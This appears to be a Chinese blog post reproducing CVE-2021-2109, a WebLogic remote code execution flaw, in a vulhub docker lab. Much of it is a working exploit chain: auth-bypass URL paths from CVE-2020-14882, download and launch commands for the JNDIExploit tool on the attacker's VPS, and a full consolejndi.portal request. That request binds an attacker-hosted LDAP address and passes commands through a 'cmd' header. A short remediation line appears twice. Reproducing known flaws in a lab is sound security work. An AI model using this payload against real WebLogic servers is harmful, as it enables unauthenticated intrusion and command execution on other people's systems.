CVE-2021-2109-LDAP远程代码执行漏洞复现
– 因果 2021.3.5
漏洞描述
2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。
影响范围
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
环境搭建
使用vulhub+docker搭建环境,docker安装请看docker安装文章
# git clone https://github.com/vulhub/vulhub.git
# cd vulhub/weblogic/CVE-2020-14882
# docker-compose up -d
访问 http://xxx.xxx.xxx.xxx:7001/console/login/LoginForm.jsp正常即可
环境搭建完成
漏洞利用
借助权限绕过漏洞(CVE-2020-14882),未授权访问到管理后台页面
/console/css/%252e%252e%252fconsole.portal //主页
/console/css/%252e%252e%252f/consolejndi.portal //JNDI 主页
利用 JNDI注入工具:JNDIExploit (该工具需要java环境)
工具地址:https://github.com/feihong-cs/JNDIExploit
下载地址:https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
使用方法:java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx (Your VPS IP)
配合 Weblogic未授权范围 命令执行,
/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
xx.xx.xxx;xxx 为自己启动 exploit的ip
ldap://xxx.xxx.xxx;xxx:1389 中的分号
通过添加自定义header,cmd: ls 的方式传递想要执行的命令
成功执行命令
修复建议
升级Weblogic Server运行环境的JDK版本
修复建议
升级Weblogic Server运行环境的JDK版本
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
